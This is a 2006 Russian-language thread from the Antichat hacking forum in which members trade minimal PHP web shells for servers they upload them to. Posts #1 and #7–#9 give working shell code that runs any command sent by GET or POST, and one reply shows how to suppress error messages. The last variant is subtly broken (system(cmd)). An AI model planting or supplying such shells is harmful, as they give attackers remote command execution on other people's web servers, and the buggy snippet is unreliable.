ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

ИНТЕРЕСНО...шелл на php
  #1  
Старый 10.06.2006, 18:07
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


Lightbulb ИНТЕРЕСНО...шелл на php

Модерам: Извините, если я запостил данную тему не в этом разделе..., просто не знаю к чему её отнести...если, что перенесите.

Вот выношу на обсуждение интересную весчъ...
Частенько заливая самописный шелл на типа вот этого:
<?php
echo "<pre>";
system($_GET['cmd']);
echo "</pre>"
?>
и обращаясь к нему по типу вот этого: _http://someserver.com/shell.php я получал ошибку,что мол
Warning!!! ла-ла ... функция system запрещена...
Но всё равно обратившись по ссылке _http://someserver.com/shell.php?cmd=ls -la получил листинг данной директори... и это был не единственный случай!!!
Мораль сей басни: сперва попробуйте выполнить команду, чем сразу к другим действиям...
 
Ответить с цитированием

  #2  
Старый 10.06.2006, 18:21
Аватар для NaX[no]rT
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

Цитата:
думаю это не листинг, даже не includ,
А что же это, что за явление?))
Глупая тема, если хватило ума залить шелл, то тем более хватит проверить, что бы там не писалось.
Фтопку!
 
Ответить с цитированием

  #3  
Старый 10.06.2006, 18:31
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

когда ты обращаешься по адрессу
http://someserver.com/shell.php
то ошибка происходит в строке
system($_GET['cmd']);
так как не определен параметр cmd
если ты будешь вызывать строку как
@system($_GET['cmd']);
то ошибки не будет.
 
Ответить с цитированием

  #4  
Старый 10.06.2006, 18:32
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Я конечно, не чего не хочу сказать, но сколько я видео не смотрел, когда заливают шелл, и вылетает такая муйня, то сразу переходят к другим методам...
 
Ответить с цитированием

  #5  
Старый 10.06.2006, 18:50
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

переходят к другим методам, когда она действительна отключена.
а по твоему первому посту, этого не видно.
 
Ответить с цитированием

  #6  
Старый 10.06.2006, 20:06
Аватар для shiz
shiz
Новичок
Регистрация: 09.06.2006
Сообщений: 16
Провел на форуме:
27859

Репутация: 5
По умолчанию

Цитата:
Сообщение от k1b0rg  
если ты будешь вызывать строку как
@system($_GET['cmd']);
то ошибки не будет.
ошибка будет, просто об этом не будет сообщения..
хотя чего эт я придираюсь, суть то одна)
 
Ответить с цитированием

  #7  
Старый 10.06.2006, 21:19
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

юзаем
<?

if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}

?>
а лучше вообще пост, но это в идеале
 
Ответить с цитированием

  #8  
Старый 10.06.2006, 22:27
Аватар для shiz
shiz
Новичок
Регистрация: 09.06.2006
Сообщений: 16
Провел на форуме:
27859

Репутация: 5
По умолчанию

а ещё добавим прелести, что б потом люди не пужалися, что чёт не работает... если конешн не для себя пишем

<?

if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}

else {
echo 'не введены данные запроса';
exit;
}

?>
 
Ответить с цитированием

  #9  
Старый 10.06.2006, 22:57
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

не спорю...
хотя на мой взгляд удобнее чем этот простого шелла нет...
<form method=post>
<input type=text name=cmd size=50>
<input type=submit value="Жми на пимпу">
</form>
<?php
echo "<pre>";
system(cmd);
echo "</pre>";
?> ....

Последний раз редактировалось Dr.Check; 10.06.2006 в 23:00..
 
Ответить с цитированием

  #10  
Старый 10.06.2006, 23:00
Аватар для shiz
shiz
Новичок
Регистрация: 09.06.2006
Сообщений: 16
Провел на форуме:
27859

Репутация: 5
По умолчанию

так это через post
а я оставил вариант через get
)
эдак мы сейчас для удобства такого понапишем... ещё одинr57shell
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31
Можно ли получить php шелл из админки phpbb 2.0.1x? [TSH]Corpse Форумы 6 07.03.2005 04:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ